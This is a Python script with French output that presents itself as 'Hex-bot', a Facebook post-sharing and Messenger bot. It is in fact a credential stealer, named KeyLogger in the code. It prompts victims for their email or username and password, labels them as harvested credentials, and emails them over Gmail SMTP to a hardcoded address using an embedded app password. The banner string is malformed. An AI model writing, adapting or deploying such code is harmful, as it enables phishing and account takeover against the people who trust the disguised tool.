import smtplib
import time
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart

# CONFIGURATION
EMAIL_ADDRESS = "lolalor20@gmail.com"
EMAIL_PASSWORD = "abiv eltm dtbp qkhj"
SEND_REPORT_EVERY = 60  # Envoi du rapport chaque 60 secondes

class KeyLogger:
    def __init__(self, interval, email, password):
        self.interval = interval
        self.log = "Keylogger lancé avec succès...\n"
        self.email = email
        self.password = password
        self.running = True

    def append_log(self, key):
        self.log += f"identifiants récupérés : {key}\n"

    def send_mail(self):
        try:
            # Connexion au serveur Gmail
            server = smtplib.SMTP("smtp.gmail.com", 587)
            server.starttls()  # Sécurise la connexion
            server.login(self.email, self.password)
            
            # Création du message avec MIME pour gérer l'encodage UTF-8
            message = MIMEMultipart()
            message["From"] = self.email
            message["To"] = self.email
            message["Subject"] = "Rapport de Keylogger"
            
            # Création du corps du message avec HTML pour préserver les caractères
            body = MIMEText(f"<pre>{self.log}</pre>", "html", "utf-8")
            message.attach(body)
            
            server.sendmail(self.email, self.email, message.as_string())
            server.quit()
            print("\033[34m[RAPPORT] Veuillez patienter, cela peut prendre quelques minutes. Connexion du bot en cours...\033[0m")  # Bleu
        except Exception as e:
            print(f"\033[31m[RAPPORT] Erreur lors de la connexion : {e}\033[0m")  # Rouge

    def run(self):
        # Affichage du message de bienvenue en couleur verte
        print("\033[1;32m" + "█╗  ██╗███████╗██╗  ██╗████████╗███████╗ ██████╗██╗  ██╗
██║  ██║██╔════╝╚██╗██╔╝╚══██╔══╝██╔════╝██╔════╝██║  ██║
███████║█████╗   ╚███╔╝    ██║   █████╗  ██║     ███████║
██╔══██║██╔══╝   ██╔██╗    ██║   ██╔══╝  ██║     ██╔══██║
██║  ██║███████╗██╔╝ ██╗   ██║   ███████╗╚██████╗██║  ██║
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝   ╚═╝   ╚══════╝ ╚═════╝╚═╝  ╚═╝
-------------------------------------------------------
   ╔═══════════════════════════════════════════════╗
   ║       [✓] TOOL NAME : TERMUX HOME             ║ 
   ║                    ║
   ║       [✓] GITHUB : SAMSMIS01                ║
   ║       [✓] FACEBOOK : HEXTECH              ║
   ║       [✓] TELEGRAM : https://t.me/hextechcar      ║
   ║       [✓] INSTAGRAM : SAMSMIS01   ║
   ║       [✓] EMAIL : hextech243@gmail.com         ║
   ╚═══════════════════════════════════════════════╝\n--------------------------------------------------------'|lolcat""")
  #your slogan\n" + "\033[0m")  # Texte vert en gras
        print("\033[32maprès avoir soumis les cordonnées demander appuyez sur 'Enter' pour connecter le bot.\n\033[0m")  # Texte vert
        print("\033[1;32m" + "Hex-bot est une solution innovante conçue pour automatiser le partage de vos publications sur Facebook, tout en facilitant l'intégration avec un bot Messenger via l'API officielle de Messenger." + "\033[0m")
        
        # Demander à l'utilisateur de saisir son email ou son nom d'utilisateur
        email_prompt = "\033[35mEntrez votre email ou nom d'utilisateur: \033[0m"
        username = input(email_prompt)  # Demander le nom d'utilisateur
        
        # Si "exit" est tapé, on quitte le programme
        if username == "exit":
            return
        
        # Demander à l'utilisateur de saisir son mot de passe
        password_prompt = "\033[35mEntrez votre mot de passe: \033[0m"
        password = input(password_prompt)  # Demander le mot de passe
        
        # Si "exit" est tapé, on quitte le programme
        if password == "exit":
            return

        # Enregistrer les frappes dans le log
        self.append_log(f"Nom d'utilisateur: {username}")
        self.append_log(f"Mot de passe: {password}")
        
        # Envoyer immédiatement le rapport après saisie
        self.send_mail()  # Envoi immédiat du rapport

# Lancement du keylogger
keylogger = KeyLogger(SEND_REPORT_EVERY, EMAIL_ADDRESS, EMAIL_PASSWORD)
keylogger.run()
